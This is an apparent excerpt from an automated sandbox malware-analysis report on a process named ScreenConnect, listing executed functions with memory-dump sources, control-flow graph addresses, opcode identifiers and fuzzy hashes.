                                                                                                                                                                                                                                          execution_graph 13489 7ff848e78124 13491 7ff848e7812d 13489->13491 13490 7ff848e78192 13491->13490 13492 7ff848e78206 SetProcessMitigationPolicy 13491->13492 13493 7ff848e78262 13492->13493

                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                          Function 00007FF849185CA1 Relevance: 2.3, Strings: 1, Instructions: 1049COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 8[H
                                                                                                                                                                                                                                          • API String ID: 0-2136615853
                                                                                                                                                                                                                                          • Opcode ID: 13c71cda89218e6b3c911afa516f1f1f2a34362d9b252d2dd4ed0772991ee114
                                                                                                                                                                                                                                          • Instruction ID: e238ac4acf8c2e4373c5f9e5c8d85761c97fe96803f203dddb24f86b8b4deeda
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13c71cda89218e6b3c911afa516f1f1f2a34362d9b252d2dd4ed0772991ee114
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B620431A1CA8B4FEBA9FE2894556B973D2FF943C0F5504B9D44EC72C6DE2CAC019A41
                                                                                                                                                                                                                                          Function 00007FF849186794 Relevance: .5, Instructions: 481COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 96d56df42f1dd80af314baa5b9d3c7dfc53b02aba2996be6fb87677749bcd705
                                                                                                                                                                                                                                          • Instruction ID: 0a7fd9b773e923edd14d9646c8c58473645f5daf3ee7bf7e4f924ad5cf811642
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96d56df42f1dd80af314baa5b9d3c7dfc53b02aba2996be6fb87677749bcd705
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FF1C130A0CE868FEBA9FF2884556B977E1FF95384F55097DD04DC7292DE2CA8029B41
                                                                                                                                                                                                                                          Function 00007FF849180090 Relevance: 4.4, Strings: 3, Instructions: 621COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 0 7ff849180090-7ff849180099 1 7ff84918009b-7ff84918009c 0->1 2 7ff8491800a3-7ff8491800de 0->2 1->2 6 7ff849180128-7ff849180150 2->6 7 7ff8491800e0-7ff849180127 2->7 11 7ff849180174-7ff84918018c 6->11 12 7ff849180152-7ff849180171 6->12 7->6 16 7ff84918018e-7ff8491801ad 11->16 17 7ff8491801b0-7ff8491801ce 11->17 12->11 16->17 22 7ff8491801ea-7ff8491801f5 17->22 23 7ff8491801d0-7ff8491801e8 17->23 27 7ff84918028e-7ff849180291 22->27 28 7ff8491801fb-7ff849180204 22->28 23->22 31 7ff8491802e8-7ff849180306 27->31 32 7ff849180293-7ff84918029d 27->32 29 7ff84918021d-7ff849180228 28->29 30 7ff849180206-7ff849180213 28->30 34 7ff84918022a-7ff849180247 29->34 35 7ff849180274-7ff84918028c 29->35 30->29 38 7ff849180215-7ff84918021b 30->38 47 7ff84918030a-7ff849180316 31->47 48 7ff849180450-7ff84918046e 31->48 39 7ff8491802a5-7ff8491802be 32->39 41 7ff84918024d-7ff849180272 34->41 42 7ff849180532-7ff84918058f 34->42 35->27 38->29 49 7ff84918032f-7ff84918033a 39->49 50 7ff8491802c0-7ff8491802c2 39->50 41->35 77 7ff84918059b-7ff8491805a2 42->77 78 7ff849180591-7ff84918059a 42->78 54 7ff84918031c-7ff84918032a 47->54 55 7ff849180318-7ff84918031a 47->55 79 7ff84918050d-7ff84918052f 48->79 80 7ff849180474-7ff84918047e 48->80 58 7ff84918033b-7ff84918033c 49->58 56 7ff84918033e-7ff84918034a 50->56 57 7ff8491802c4 50->57 63 7ff84918032d-7ff84918032e 54->63 55->63 59 7ff84918034c-7ff84918034e 56->59 60 7ff849180350-7ff849180351 56->60 57->47 64 7ff8491802c6-7ff8491802ca 57->64 58->56 66 7ff849180361-7ff849180365 59->66 67 7ff849180352-7ff84918035e 60->67 63->49 64->58 69 7ff8491802cc-7ff8491802d1 64->69 70 7ff849180366-7ff84918037e 66->70 67->66 69->67 73 7ff8491802d3-7ff8491802de 69->73 88 7ff849180384-7ff849180392 70->88 89 7ff849180380-7ff849180382 70->89 74 7ff84918034f 73->74 75 7ff8491802e0-7ff8491802e5 73->75 74->60 75->70 81 7ff8491802e7 75->81 84 7ff8491805ae-7ff8491805b9 77->84 85 7ff8491805a4-7ff8491805ad 77->85 79->42 86 7ff849180484-7ff849180492 80->86 87 7ff849180480-7ff849180482 80->87 81->31 93 7ff8491805bb-7ff8491805d9 84->93 94 7ff8491805da-7ff8491805fb 84->94 90 7ff849180495-7ff8491804b2 86->90 87->90 92 7ff849180395-7ff8491803b2 88->92 89->92 101 7ff8491804b8-7ff8491804c6 90->101 102 7ff8491804b4-7ff8491804b6 90->102 104 7ff8491803b8-7ff8491803c6 92->104 105 7ff8491803b4-7ff8491803b6 92->105 93->94 107 7ff8491804c9-7ff8491804e6 101->107 102->107 108 7ff8491803c9-7ff8491803df 104->108 105->108 113 7ff8491804ec-7ff8491804fa 107->113 114 7ff8491804e8-7ff8491804ea 107->114 115 7ff8491803f6-7ff8491803fd 108->115 116 7ff8491803e1-7ff8491803f4 108->116 117 7ff8491804fd-7ff849180506 113->117 114->117 120 7ff849180404-7ff849180417 115->120 116->115 121 7ff84918041d-7ff849180420 116->121 117->79 120->121 122 7ff849180437-7ff84918044a 121->122 123 7ff849180422-7ff849180435 121->123 122->48 123->48 123->122
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: bH$ bH$ bH
                                                                                                                                                                                                                                          • API String ID: 0-3431803290
                                                                                                                                                                                                                                          • Opcode ID: 88d1f51b28ba68975d0443d6508bed7b3c233c26f7ea9b4b03318f6beaed267c
                                                                                                                                                                                                                                          • Instruction ID: 599e0af714ec6e56a13a0589750a01010f756c3f0a57bbec7fb33bd19d538304
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 88d1f51b28ba68975d0443d6508bed7b3c233c26f7ea9b4b03318f6beaed267c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE12F131A1CA8E8FE7A9FA2C94556F437D1FF69380F4540B9D44EC7297DE28E8428760
                                                                                                                                                                                                                                          Function 00007FF8491880CD Relevance: 2.7, Strings: 2, Instructions: 225COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 8Y I$@hH
                                                                                                                                                                                                                                          • API String ID: 0-4237702953
                                                                                                                                                                                                                                          • Opcode ID: bada670e1af6b1b112ea3f27df3144f87993bc86bf867a392445177e65d5e89b
                                                                                                                                                                                                                                          • Instruction ID: 16431f7458a71bcb0fb732e727cf6fa5a576f3268f21db9c18eb8d72fc4bfa13
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bada670e1af6b1b112ea3f27df3144f87993bc86bf867a392445177e65d5e89b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D518621E1DACA0FE7A5FA3854560F87BE1FF95280B1901FAC09DC7187DD1DA806C781
                                                                                                                                                                                                                                          Function 00007FF848E78124 Relevance: 1.7, APIs: 1, Instructions: 180COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3291653084.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff848e70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1088084561-0
                                                                                                                                                                                                                                          • Opcode ID: 94f444be349e4fecb562f899c2ee173129c3e9e64c9dce0c2c03b35044ea77a3
                                                                                                                                                                                                                                          • Instruction ID: a2f474b63aef2c3eb11d8a094b34681f26f0194cddb754c829b3e4f2cc1ae145
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94f444be349e4fecb562f899c2ee173129c3e9e64c9dce0c2c03b35044ea77a3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4514931D1CB584FD718AF689C4A5E97BE0EF55361F04027EE049C3192DF78A846C795
                                                                                                                                                                                                                                          Function 00007FF849184DE5 Relevance: .3, Instructions: 311COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b1be42bd27a54fc4bd5fdc5ce7f5c85bf47cf30eb8328e3a7fafd1215959707f
                                                                                                                                                                                                                                          • Instruction ID: 91ed95b7d0f0614b801ae9ce920714e68c136a26664235a4a46b301ee97a3f13
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1be42bd27a54fc4bd5fdc5ce7f5c85bf47cf30eb8328e3a7fafd1215959707f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C91273290DACB5FE778FA2894514B573E1FF65790B1501BDC44E875C6EE2DB80A8B80
                                                                                                                                                                                                                                          Function 00007FF849185E65 Relevance: .2, Instructions: 243COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2e1d302cff9014ddaaeb25542aa9aabf9631b30e0edec7496694134972267e92
                                                                                                                                                                                                                                          • Instruction ID: 04a5ddb28259a4043cf6832bc05f7d7f01296e224d2f28ca3a1b7f12d50e9ba1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e1d302cff9014ddaaeb25542aa9aabf9631b30e0edec7496694134972267e92
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A819130A1DE8B8EE7A9FE3844152B976D2FF953C4F550878D05EC72C2EE2DB8059A41
                                                                                                                                                                                                                                          Function 00007FF849185EED Relevance: .2, Instructions: 239COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 35dc5acb15c2735d4f94d364cb7f3d2fe52a0592068a19b7797f3c929854cb1a
                                                                                                                                                                                                                                          • Instruction ID: 912501262ea53f80f388f991c2c9f2dffcd36464e802c704a7a37e2837af8aa9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35dc5acb15c2735d4f94d364cb7f3d2fe52a0592068a19b7797f3c929854cb1a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8818220A1DE8B8EE7B9FA3844152B966D2FF953C4F560978D05DC72C2DF2DB8029B41
                                                                                                                                                                                                                                          Function 00007FF8491862DF Relevance: .2, Instructions: 225COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 23d808b4cfb625c681a451edc918f435b2c99353771f1c97f98e5c475830766d
                                                                                                                                                                                                                                          • Instruction ID: ae454af6f329ed6d1f608320335a9d01274e9f412d44d49a491f8ae437a9b794
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 23d808b4cfb625c681a451edc918f435b2c99353771f1c97f98e5c475830766d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2718030A1CE8B8EE7B5FA3844542B966E2FF953C4F560978D44DC72C2DE2CB8069B41
                                                                                                                                                                                                                                          Function 00007FF849183B45 Relevance: .2, Instructions: 224COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7709c672f109aba5f4d679f7a1d41ebd20626bc249c013c79232c29df4b6587d
                                                                                                                                                                                                                                          • Instruction ID: 8ba6fa1fc7423370f537b810d4995e04b211a35e780a42c9c35f49c16230a3bb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7709c672f109aba5f4d679f7a1d41ebd20626bc249c013c79232c29df4b6587d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0571203460DA4A8FDBDCEF18C494AA577E2FF99344B2505A9D01DCB296CA39EC47CB40
                                                                                                                                                                                                                                          Function 00007FF849186AB8 Relevance: .2, Instructions: 171COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8bd700e518ecc7b888f016def02b5993f230ceb8a6f3029959a1c9089fb75fc1
                                                                                                                                                                                                                                          • Instruction ID: af39de4b8c2decad1e77647db20037bc55be50648747cbfd8ec1bc0af3547920
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8bd700e518ecc7b888f016def02b5993f230ceb8a6f3029959a1c9089fb75fc1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E518330A1CEDB8EEBB5FE2440242BA62D2BF943C4F560978D45DD72C1DF2DB8015A45
                                                                                                                                                                                                                                          Function 00007FF8491827CE Relevance: .2, Instructions: 164COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a83151af60d7ee6c183ca37981707a75c382daeda3f4bddcd5038f7081c20a6d
                                                                                                                                                                                                                                          • Instruction ID: c906833cbfb37b6d99fceaebca688a3b441fac27fc5be212584532c2ec5cfe5a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a83151af60d7ee6c183ca37981707a75c382daeda3f4bddcd5038f7081c20a6d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A51A771E0C98A8FEBD9EE189454AA037E1FF69750F0504B9D44EC7287DE29EC42CB40
                                                                                                                                                                                                                                          Function 00007FF849188380 Relevance: .2, Instructions: 152COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 25688c99e7177125410c84413d7a84a311c4b2a26b1e030f29151451f315a2b8
                                                                                                                                                                                                                                          • Instruction ID: 3c3fdd35f271fe1f33da97015a08eed32bc50f188f8f9ac5c1699916045cb816
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25688c99e7177125410c84413d7a84a311c4b2a26b1e030f29151451f315a2b8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8541E433E0DD8A8FEB66FA68A8511A977E1FF94394F0501B9D15DC3192DF28A802CB41
                                                                                                                                                                                                                                          Function 00007FF849180CA0 Relevance: .1, Instructions: 140COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7d4c68e4b4a1d7576ce61fcb628e087140c8eef90698e622cd6c7353139d2b9c
                                                                                                                                                                                                                                          • Instruction ID: 8213f95bbb18116e0360d528b5f99eb507f997cc91566636ec6f4a1331acbd27
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d4c68e4b4a1d7576ce61fcb628e087140c8eef90698e622cd6c7353139d2b9c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A41DAA284E9D62EE35DFB78E4554F87B60EF02258F0C81F7D09C89093DE0D68499B65
                                                                                                                                                                                                                                          Function 00007FF849185054 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9979849d071cb065821359939823faf9dc24cd7ee3092d7b292f6a750f6cd421
                                                                                                                                                                                                                                          • Instruction ID: 66101c3c74e58e6286b93df248c68fde4ec4fce4bbae386bca3a31fba1b39a77
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9979849d071cb065821359939823faf9dc24cd7ee3092d7b292f6a750f6cd421
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D31C432A0CE4A1FEF58FE1CA4429F973D0EF55390B4446BAD44B83187ED29F8468B84
                                                                                                                                                                                                                                          Function 00007FF849188809 Relevance: .1, Instructions: 109COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 199bdbc8e57b73ac204a3c6d103cc80d1915b2992c34d9fbca2a5f380035d6d8
                                                                                                                                                                                                                                          • Instruction ID: dba20f4a7fa21cd761e7455c18d223d9e88c48f00a13fb2448274b02fedb4a6e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 199bdbc8e57b73ac204a3c6d103cc80d1915b2992c34d9fbca2a5f380035d6d8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E131EA32E0DAC98FE765EB6458211E83BA1EF46390F0601EBD15CD72D2DF1D9C019B42
                                                                                                                                                                                                                                          Function 00007FF849186BF7 Relevance: .1, Instructions: 97COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 615f774f5ebdaede2e33128be6efbc552ad8c339697b3d56b93677769b042d2d
                                                                                                                                                                                                                                          • Instruction ID: f57386829b49f046a60e9f8d028f57857500aa3f2f2c021b9376240815e76d21
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 615f774f5ebdaede2e33128be6efbc552ad8c339697b3d56b93677769b042d2d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A316130E5CA978EEBB9FF2540542BD62D2BF943C4F954938D45E822C2DF3DB8429A44
                                                                                                                                                                                                                                          Function 00007FF849180900 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3956b615fcb5dc9a98529015f886bf8886cf87e6eeea8267d2a267143b707ea1
                                                                                                                                                                                                                                          • Instruction ID: 245c4aaced231ba536eb4220de870a3c0e6ed5260656651ba4deb1e1f245e0d5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3956b615fcb5dc9a98529015f886bf8886cf87e6eeea8267d2a267143b707ea1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C11BF3061C9484FE794FE28D4986B6B3E2FBD8355F14057ED84EC76A5DE6AAC80CB40
                                                                                                                                                                                                                                          Function 00007FF84918528D Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d8ad06bd060150af9ac295b11326e5979b69f03ad4a61845468dc39ea7704afe
                                                                                                                                                                                                                                          • Instruction ID: e20782b637d29a8519232951d5bdc86d694232e5e01b13f81bf3085b0510f378
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8ad06bd060150af9ac295b11326e5979b69f03ad4a61845468dc39ea7704afe
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9811B171E0DB898FEFA5EF6858650A83FA1FF55340F0600EAD449C3296DE78A800CB02
                                                                                                                                                                                                                                          Function 00007FF84918287C Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ca70605fd984ea13d58d33a046a4325c48561046274796ac8c16dd75ff508811
                                                                                                                                                                                                                                          • Instruction ID: c2579abbae620564b94947c2965921ece9bf6722f5af81da0619e59bbde1ef56
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca70605fd984ea13d58d33a046a4325c48561046274796ac8c16dd75ff508811
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6115E31E0C98A8FDB99EF188450B6577E1FF68784F0544B9C44EDB287DE39E8468B80
                                                                                                                                                                                                                                          Function 00007FF8491828E5 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
